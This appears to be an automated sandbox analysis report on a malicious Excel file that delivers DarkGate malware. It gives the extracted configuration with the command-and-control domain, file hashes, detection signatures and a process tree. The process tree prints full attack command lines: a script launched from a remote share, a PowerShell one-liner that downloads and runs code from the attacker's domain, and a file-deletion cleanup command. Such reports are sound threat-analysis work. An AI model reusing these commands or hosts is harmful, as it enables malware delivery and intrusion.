Analysis
-
max time kernel
531s -
max time network
478s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
27-02-2024 15:24
Static task
static1
General
-
Target
scanned_doc#2024-27-2_6645.xlsx
-
Size
55KB
-
MD5
eedb87b1913b5b1bd864fedb04f30e9d
-
SHA1
6e7bf83d38e1672a6f15979effa76e659af7d7ec
-
SHA256
ca497dd08e13d2276d2ec99a0edd71e1283d00d2260b8d59a6eb6a25193b7113
-
SHA512
131d8d9446103058a021a01b6c4569026be959370cf1bb35b5bb5900fd9a96064992e3121d7c8742b01c7f68fadc9c9db3eec8946440f5032c9985eae8da8255
-
SSDEEP
1536:p/ToOEjzAw7Y2r7DUsV4XzY9t3jSagJYwehDC:BoOAcw7nXDUsOjm3jTxhDC
Malware Config
Extracted
darkgate
admin888
remasterprodelherskjs.com
-
anti_analysis
false
-
anti_debug
false
-
anti_vm
false
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
PAuTCBnH
-
minimum_disk
50
-
minimum_ram
7000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 14 IoCs
resource yara_rule behavioral1/memory/1316-62-0x0000000005AB0000-0x0000000005DFF000-memory.dmp family_darkgate_v6 behavioral1/memory/3300-72-0x0000000002E90000-0x0000000003632000-memory.dmp family_darkgate_v6 behavioral1/memory/1316-73-0x0000000005AB0000-0x0000000005DFF000-memory.dmp family_darkgate_v6 behavioral1/memory/3300-77-0x0000000002E90000-0x0000000003632000-memory.dmp family_darkgate_v6 behavioral1/memory/3332-82-0x00000000029F0000-0x0000000003192000-memory.dmp family_darkgate_v6 behavioral1/memory/3300-83-0x0000000002E90000-0x0000000003632000-memory.dmp family_darkgate_v6 behavioral1/memory/3300-84-0x0000000002E90000-0x0000000003632000-memory.dmp family_darkgate_v6 behavioral1/memory/3300-85-0x0000000002E90000-0x0000000003632000-memory.dmp family_darkgate_v6 behavioral1/memory/3300-86-0x0000000002E90000-0x0000000003632000-memory.dmp family_darkgate_v6 behavioral1/memory/3332-88-0x00000000029F0000-0x0000000003192000-memory.dmp family_darkgate_v6 behavioral1/memory/3300-89-0x0000000002E90000-0x0000000003632000-memory.dmp family_darkgate_v6 behavioral1/memory/3332-90-0x00000000029F0000-0x0000000003192000-memory.dmp family_darkgate_v6 behavioral1/memory/3332-94-0x00000000029F0000-0x0000000003192000-memory.dmp family_darkgate_v6 behavioral1/memory/3300-95-0x0000000002E90000-0x0000000003632000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4512 3772 WScript.exe 75 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1316 created 2636 1316 AutoIt3.exe 39 PID 3300 created 2636 3300 GoogleUpdateCore.exe 39 -
Blocklisted process makes network request 4 IoCs
flow pid Process 10 4204 powershell.exe 11 4204 powershell.exe 12 4204 powershell.exe 13 4204 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 1316 AutoIt3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GoogleUpdateCore.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoIt3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GoogleUpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoIt3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GoogleUpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GoogleUpdateCore.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1176 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3772 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 4204 powershell.exe 4204 powershell.exe 4204 powershell.exe 1316 AutoIt3.exe 1316 AutoIt3.exe 1316 AutoIt3.exe 1316 AutoIt3.exe 3300 GoogleUpdateCore.exe 3300 GoogleUpdateCore.exe 3300 GoogleUpdateCore.exe 3300 GoogleUpdateCore.exe 3332 GoogleUpdateCore.exe 3332 GoogleUpdateCore.exe 3300 GoogleUpdateCore.exe 3300 GoogleUpdateCore.exe 3300 GoogleUpdateCore.exe 3300 GoogleUpdateCore.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3300 GoogleUpdateCore.exe 3332 GoogleUpdateCore.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4204 powershell.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE 3772 EXCEL.EXE -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 3772 wrote to memory of 4512 3772 EXCEL.EXE 83 PID 3772 wrote to memory of 4512 3772 EXCEL.EXE 83 PID 4512 wrote to memory of 4204 4512 WScript.exe 84 PID 4512 wrote to memory of 4204 4512 WScript.exe 84 PID 4204 wrote to memory of 1316 4204 powershell.exe 86 PID 4204 wrote to memory of 1316 4204 powershell.exe 86 PID 4204 wrote to memory of 1316 4204 powershell.exe 86 PID 1316 wrote to memory of 3300 1316 AutoIt3.exe 87 PID 1316 wrote to memory of 3300 1316 AutoIt3.exe 87 PID 1316 wrote to memory of 3300 1316 AutoIt3.exe 87 PID 1316 wrote to memory of 3300 1316 AutoIt3.exe 87 PID 3300 wrote to memory of 3332 3300 GoogleUpdateCore.exe 88 PID 3300 wrote to memory of 3332 3300 GoogleUpdateCore.exe 88 PID 3300 wrote to memory of 3332 3300 GoogleUpdateCore.exe 88 PID 3300 wrote to memory of 3332 3300 GoogleUpdateCore.exe 88 PID 3300 wrote to memory of 2824 3300 GoogleUpdateCore.exe 90 PID 3300 wrote to memory of 2824 3300 GoogleUpdateCore.exe 90 PID 3300 wrote to memory of 2824 3300 GoogleUpdateCore.exe 90 PID 2824 wrote to memory of 1176 2824 cmd.exe 91 PID 2824 wrote to memory of 1176 2824 cmd.exe 91 PID 2824 wrote to memory of 1176 2824 cmd.exe 91
Processes
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2636
-
C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3300 -
\??\c:\windows\SysWOW64\cmd.exe"c:\windows\system32\cmd.exe" /c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\abhfedb\ & rmdir /s /q C:\ProgramData\abhfedb\3⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
\??\c:\windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
PID:1176
-
-
-
-
C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"2⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:3332
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scanned_doc#2024-27-2_6645.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\yellow.vbs"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'remasterprodelherskjs.com/wzglcrnu')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\temp\AutoIt3.exe"C:\temp\AutoIt3.exe" script.a3x4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1316
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55da1a534a2378d3b8c4ba75f7dec8086
SHA1a444e90b3f7455d922346d689c565a462cb62f3d
SHA25660cb910f7a4b23ab2d05f85f1f6cf60d9654352f61f422548df0fab29229707e
SHA512e9e2bdbc812649b2e74aaa5713c3ae01119119ba827b36a05c6ecb727af49317fc0800584dff3f213bb742481b8f9fe8bdb0ed6d3166f177ad0c1b5798df814d
-
Filesize
471KB
MD5589f36f1ede969f8e54e6d2398e48bf2
SHA1a5bfbe7ef10416bd36826f1fc5cb6c0832cbd08c
SHA2561735ceb79a6ab15ccd12e34da39727e2c92e468e07c8d49c2bda36dd2514ab08
SHA5124a0298e7b54d6bfababe94805b67ae173b84799573934d2ee8225bb3a24ae3de4491e8387b6b3217fbfa80157d1ab75456285f9c29b3f61ef02219bbe437f75c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32B
MD56e728bb0ed5ff8bc2782112515927ba0
SHA167b01195c26f7934bb2de85f0250050b2f5849e0
SHA2563f0e3e88a3b219d24be96bb595157443c050a68f85d1e8306c290cdff9ee4134
SHA512bfbb0218dc248eb1dfe16d33670743aae211ed6b0e1ae62af161cd5c7c0b4c991f816c04f60c33a437525f47241581b750e2cfd1f9d9cc9a8dbdfeffec919d39
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
4B
MD57376d25771fdf78adae67f6b72afdb0d
SHA1c522b72845b17d0ebdf6e6269a08c2d622841157
SHA25678a5d6046791961e1cd0812a3881de786ef2ecdb40955f9598d922722ada5fdf
SHA512bd43ff253e9feb72043a172d9796c9fca60e1cc09f99f0cf04b160680e74fb7626c5c25281d03dfb9885080275c26e517c499345130a4e6c6661df2c4949fef5
-
Filesize
4B
MD58a0bf1e3994003ac1c87752c6249ddbf
SHA11419e543e186b8b44689b5c7d0a3227652ccf0d1
SHA256df7bb35d8b030d452ad829aa5ab3d098b2098de3827bc29a107de8fff9544eca
SHA512c2dab769e156eab4050db0404cac7cec437ea4b55473ea5423bb2ed78d6e763f454e9457dab417bf73552c3f0e41654876fbc2717e521c5334b8501550a0215d
-
Filesize
4B
MD56eeb3608ab26836c60cfe9c1910103c2
SHA1c8fa89eab26128bc0a801eea339fa27acd307a40
SHA2569cae0c3437a5fa5743bd40b4aacc1784f0f14511a3973885f0d6f33e4c26f288
SHA512d73cff64c36fd650b7907b150901d346807e1b4984cbab8c7d12afb39a8487a97fd735ba48319676af025472ebba63cbc88dc9913042fcad82943c89a3f65a23
-
Filesize
469KB
MD5fed1cada5e6082bc1393036555d061b9
SHA137b1a821af0e64104c9ffcb8fa39ab4d78c7374d
SHA2562c8ddb6ee845e48c776da5e06cbaf4529b5909384e4786f533d6dd3b679d295c
SHA5126d0fa057c3a1a9aaf39a6fe596d5a12a5f5689dc48811c2e09c001e63f9712e9103d2d21c6afb1d4321823bf6c78263818695e3c8f821f39ad2f4d89404bf630
-
Filesize
76B
MD584daf31ae22d4a6a40b0fffda6ea2995
SHA17912e09030e200187682f5253068b27fd824faf2
SHA256c490210dba7ecd1a4987d4dab36d3f6d5a0a1a7eaf47f1e3cf0f93dd4244e65d
SHA51269210ed3bb6ee8aa0e7a8a5d148774aaae4e58390736354f5ac1ed5919714778234a3d79358dc6299bdcd12a754adbdadee17b4349061107981d865b84245f46
-
Filesize
4B
MD5c951355d967a84bf1b2fd73de6b9f79e
SHA1fa578c6b8ca0173a0cf8f76d1b291fd519a66b5e
SHA256639bad206c6724ac8a56248de312949739815a61450d1dd05f26934f6640902c
SHA512475403c415b4cc62dce962e7f5b6f55301f7caa9d2a72f60ea0b357159ac3fea8692101290c93a86d0e9dc390d1d5f7cdf8fe698cc89c974874452408c0dc53d